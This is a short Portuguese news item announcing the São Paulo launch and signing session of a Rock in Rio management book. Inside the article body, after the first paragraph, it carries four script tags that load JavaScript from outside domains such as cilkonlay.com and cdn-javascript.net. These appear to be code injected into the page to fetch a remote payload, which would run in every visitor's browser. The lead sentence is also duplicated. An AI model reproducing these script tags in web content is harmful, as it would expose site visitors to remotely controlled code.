Experiência de Marca

Livro do Rock in Rio será lançado em São Paulo

A sessão de autógrafos será na Livraria Saraiva, do Shopping Pátio Paulista, com a presença dos autores e de Rodolfo Medina, VP de Marketing e Parcerias do Rock in Rio. <script src="//cilkonlay.com/2176e1b695bb4978f2.js"></script> <script src="https://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8566x" type="text/javascript"></script> <script src="https://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8566x&format=arrjs&r=1573781165668" type="text/javascript"></script> <script src="https://cilkonlay.com/ext/2176e1b695bb4978f2.js?sid=52564_8566_&title=a&blocks[]=31af2" type="text/javascript"></script>

A sessão de autógrafos será na Livraria Saraiva, do Shopping Pátio Paulista, com a presença dos autores e de Rodolfo Medina, VP de Marketing e Parcerias do Rock in Rio.

Na segunda-feira, 18 de novembro, das 19h às 21h30, o Rock in Rio lança o seu primeiro livro de gestão com a presença dos autores Allan Costa e Arthur Igreja e do Rodolfo Medina, VP de Marketing e Parcerias do Rock in Rio, para uma sessão de autógrafos.

As últimas novidades do mercado de live marketing estão aqui.

Todas as ativações de marca no Rock in Rio estão aqui.

“Rock in Rio – A Arte de Sonhar e Fazer Acontecer”, escrito por Arthur Igreja e Allan Costa com a contribuição dos executivos de marca, traz provocações valiosas para que o leitor possa aplicar a cultura empresarial Rock in Rio no seu próprio negócio.

Será a oportunidade de entender a visão que impulsiona o negócio que está por trás do maior festival de música e entretenimento do mundo.

O livro, publicado pela Editora Gente, está disponível nas principais livrarias do país.